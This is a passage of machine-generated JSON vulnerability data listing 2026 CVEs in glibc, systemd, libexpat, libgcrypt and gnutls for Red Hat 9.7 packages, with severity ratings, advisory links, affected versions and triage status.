"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 617 ], "description": "The iconv() function in the GNU C Library versions 2.43 and earlier may crash due to an assertion failure when converting inputs from the IBM1390 or IBM1399 character sets, which may be used to remotely crash an application.\n\n\n\nThis vulnerability can be trivially mitigated by removing the IBM1390 and IBM1399 character sets from systems that do not need them.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-4046" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-4046" }, { "url": "https://inbox.sourceware.org/libc-announce/76814edf-cf7f-47ec-979d-2dce0a2c76bf@gotplt.org/T/#u" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4046" }, { "url": "https://packages.fedoraproject.org/pkgs/glibc/glibc-gconv-extra/" }, { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=33980" }, { "url": "https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2026-0007" }, { "url": "https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2026-0007;hb=HEAD" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-4046" } ], "published": "2026-03-30T18:16:19+00:00", "updated": "2026-04-20T22:16:23+00:00", "affects": [ { "ref": "pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.34-231.el9_7.10", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.34-231.el9_7.10", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.34-231.el9_7.10", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-4105", "ratings": [ { "source": { "name": "redhat" }, "score": 6.7, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" } ], "cwes": [ 284 ], "description": "A flaw was found in systemd. The systemd-machined service contains an Improper Access Control vulnerability due to insufficient validation of the class parameter in the RegisterMachine D-Bus (Desktop Bus) method. A local unprivileged user can exploit this by attempting to register a machine with a specific class value, which may leave behind a usable, attacker-controlled machine object. This allows the attacker to invoke methods on the privileged object, leading to the execution of arbitrary commands with root privileges on the host system.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-4105" }, { "url": "https://access.redhat.com/errata/RHSA-2026:7299" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-4105" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447262" }, { "url": "https://github.com/systemd/systemd/security/advisories/GHSA-4h6x-r8vx-3862" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4105" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-4105" } ], "published": "2026-03-13T19:55:13+00:00", "updated": "2026-04-30T17:16:26+00:00", "affects": [ { "ref": "pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "252-55.el9_7.8", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/systemd-pam@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "252-55.el9_7.8", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/systemd-rpm-macros@252-55.el9_7.8?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "252-55.el9_7.8", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/systemd@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "252-55.el9_7.8", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/systemd-pam@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/systemd-rpm-macros@252-55.el9_7.8?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/systemd@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/systemd-pam@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/systemd-rpm-macros@252-55.el9_7.8?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/systemd@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/systemd-pam@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/systemd-rpm-macros@252-55.el9_7.8?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/systemd@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/systemd-libs@252-55.el9_7.8?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-41080", "ratings": [ { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 3.7, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "cwes": [ 331 ], "description": "libexpat before 2.8.0 uses insufficient entropy, and thus hash flooding can occur via a crafted XML document.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-41080" }, { "url": "http://www.openwall.com/lists/oss-security/2026/04/26/1" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-41080" }, { "url": "https://blog.hartwork.org/posts/expat-2-8-0-released/" }, { "url": "https://github.com/libexpat/libexpat/issues/47" }, { "url": "https://github.com/libexpat/libexpat/pull/1183" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41080" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-41080" }, { "url": "https://www.openwall.com/lists/oss-security/2026/04/26/1" } ], "published": "2026-04-16T17:16:54+00:00", "updated": "2026-04-27T07:16:03+00:00", "affects": [ { "ref": "pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.5.0-5.el9_7.1", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-41989", "ratings": [ { "source": { "name": "azure" }, "severity": "low" }, { "source": { "name": "redhat" }, "score": 7.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "cwes": [ 787 ], "description": "Libgcrypt before 1.12.2 sometimes allows a heap-based buffer overflow and denial of service via crafted ECDH ciphertext to gcry_pk_decrypt.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-41989" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-41989" }, { "url": "https://dev.gnupg.org/T8211" }, { "url": "https://lists.gnupg.org/pipermail/gnupg-announce/2026q2/000503.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41989" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-41989" }, { "url": "https://www.openwall.com/lists/oss-security/2026/04/21/1" } ], "published": "2026-04-23T05:16:05+00:00", "updated": "2026-04-27T18:33:18+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "1.10.0-11.el9", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "in_triage", "justification": "", "response": [], "detail": "This CVE is under investigation by Confluent." } }, { "id": "CVE-2026-41990", "ratings": [ { "source": { "name": "redhat" }, "score": 3.3, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:L" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 787 ], "description": "Libgcrypt before 1.12.2 mishandles Dilithium signing. Writes to a static array lack a bounds check but do not use attacker-controlled data.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-41990" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-41990" }, { "url": "https://dev.gnupg.org/T8208" }, { "url": "https://lists.gnupg.org/pipermail/gnupg-announce/2026q2/000503.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41990" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-41990" }, { "url": "https://www.openwall.com/lists/oss-security/2026/04/21/1" } ], "published": "2026-04-23T05:16:05+00:00", "updated": "2026-04-27T18:33:27+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "1.10.0-11.el9", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libgcrypt@1.10.0-11.el9?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-42010", "ratings": [ { "source": { "name": "redhat" }, "score": 7.1, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N" } ], "cwes": [ 626 ], "description": "A flaw was found in gnutls. Servers configured with RSA-PSK (Rivest\u2013Shamir\u2013Adleman \u2013 Pre-Shared Key) wrongfully matched usernames containing a NUL character with truncated usernames. A remote attacker could exploit this by sending a specially crafted username, leading to an authentication bypass. This vulnerability allows an attacker to gain unauthorized access by circumventing the authentication process.", 